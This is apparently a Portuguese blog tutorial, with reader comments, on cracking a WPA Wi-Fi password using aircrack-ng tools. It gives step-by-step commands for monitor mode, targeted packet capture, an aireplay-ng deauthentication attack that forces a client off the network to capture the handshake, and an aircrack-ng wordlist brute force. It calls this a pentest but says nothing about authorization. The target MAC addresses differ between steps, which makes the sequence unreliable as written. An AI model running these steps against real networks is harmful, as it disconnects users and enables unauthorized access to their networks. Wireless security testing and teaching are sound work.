Preparando a interface em modo monitor
Primeiramente vamos listar todas as interfaces disponíveis que tenham suporte para a suíte do Aircrack
root@fidelis:/home/matheus# airmon-ng
No exemplo eu estarei utilizando uma placa wireless externa para realizar o ataque. Caso você não possua uma (que é o recomendado), você pode estar utilizando a interface padrão wlan0 mesmo.
root@fidelis:/home/matheus# iwconfig wlan1
root@fidelis:/home/matheus# ifconfig wlan1 down
root@fidelis:/home/matheus# iwconfig wlan1 mode monitor
root@fidelis:/home/matheus# ifconfig wlan1 up
Vamos ativar a placa colocando ela em modo de monitoramento.
Se tudo ocorreu como planejado, isso quer dizer que a placa agora está em um modo monitor. Vamos colocar ela para capturar todos os pacotes dos dispositivos ao alcance.
root@fidelis:/home/matheus# airodump-ng wlan1
Analisando os dados que o airodump nos dá, podemos notar os seguintes detalhes:
- BSSID - Endereço MAC da rede alvo;
- CHANNEL(CH) - Canal o qual está a rede sem fio
- ENCRYPTATED (ENC) - O tipo de criptogradia que o Wifi utiliza
- AUTHENTICATION - O tipo de autenticação da rede.
Então vamos dar o mesmo comando, só que pedindo para o airodump capturar os pacotes de uma unica rede em específico, no caso a que queremos efetuar o pentest. Anote o BSSID da rede e o canal, agora vamos preparar a interface para analisar somente a rede em específico.
root@fidelis:/home/matheus# airodump-ng --bssid 52:55:27:B4:4A:BC --channel 6 --write wifi wlan1
Neste comando iremos informar o airodump o MAC e o canal que ele deve monitorar, então no parâmetro --bssid, informe o MAC do alvo e em --channel o canal. Especifique a interface de monitoramento e manda bala.
Aqui vamos precisar prestar atenção em DUAS Informações importantes.
O Airodump irá nos mostrar todos os dispositivos que estão conectados como estações na rede que vamos atacar. Neste caso iremos efetuar um ataque de handshake, entre a rede e a estação. Para isso iremos utilizar mais uma ferramenta da suíte do Aircrack, o Aireplay. Esta ferramenta irá forçar o cliente a se desautenticar. É a autenticação que ele vai forçar em seguida que devemos capturar. Você terá que ser paciente e tentar mais e mais, gerando várias listas wifi-0*.cap
root@fidelis:/home/matheus# aireplay-ng -0 100 -a F8:1A:67:D4:E2:60 -c 44:74:6C:F0:19:19 wlan1
Onde:
- 0 100 - é a quantidade de injeções que iremos efetuar
- a - É o BSSID do alvo
- c - É o Cliente que está acessando a rede do alvo.
O Handshake é literalmente um "Aperto de Mão" entre a estação e o roteador WIFI, onde o cliente irá apresentar a senha e irá passar. Esse processo irá desconectar a estação do roteador alvo, e o software irá tentar capturar os pacotes desse handshake para crackearmos mais tarde.
Vamos realizar agora um processo de brute force na rede a partir destes arquivinhos, iremos fazer uso de uma wordlist para tal.
root@fidelis:/home/matheus# aircrack-ng wifi-01.cap -w /home/matheus/Dropbox/Materiais/Pentests/passlist/passlist.txt -b E8:CC:18:F3:B0:80
Onde
- -w é onde iremos ver a wordlist
- -b é onde iremos colocar o BSSID do alvo.
- wifi-01.cap é o arquivo gerado com os pacotes capturados anteriormente
root@fidelis:/home/matheus# aircrack-ng wifi-*.cap -w /home/matheus/Dropbox/Materiais/Pentests/passlist/passlist.txt -b E8:CC:18:F3:B0:80
O ideal é efetuar o método de autenticação com vários clientes. Trocando sempre o MAC Address e talvez a passlist.
:)
Este comentário foi removido pelo autor.
ResponderExcluiraircrack-ng wifi-01.cap -w /home/matheus/Dropbox/Materiais/Pentests/passlist/passlist.txt -b E8:CC:18:F3:B0:80
ResponderExcluirAmigo no comando acima qual o bssid que esta sendo informado é o mac do seu note no caso atacante ficou meio vago isso kk
"Onde
Excluir-w é onde iremos ver a wordlist
-b é onde iremos colocar o BSSID do alvo.
wifi-01.cap é o arquivo gerado com os pacotes capturados anteriormente "
Este comentário foi removido pelo autor.
ResponderExcluirBacana o conteúdo, só queria contribuir com o seguinte...
ResponderExcluirÉ bom esclarecer que neste processo é preciso deixar 2 terminais aberto um rodando o airodump e outro o aireplay. No terminal que está rodando o airodump quando for capturado o handshake ele avisa, da uma mensagem no canto superior e rapidamente muda de status. Uma vez capturado o handshake o que falta é quebrar a criptografia seja por wordlist ou brute force.
e p voltar do mode monitor para o modo de conexao?
ResponderExcluirNa parte:
ResponderExcluirroot@fidelis:/home/matheus# aireplay-ng -0 100 -a F8:1A:67:D4:E2:60 -c 44:74:6C:F0:19:19 wlan1
o depois do -c e meu endereço mac ? e como faço para pegalo atraves do ifconfig ?
-c é o mac de algum cliente que esta usando o AP... Consegue ver no airodump
ExcluirHá sim, ok. Obg
ExcluirSó faltou a wordlist, seria bom também alguém fazer um tutorial de pyrit
ResponderExcluir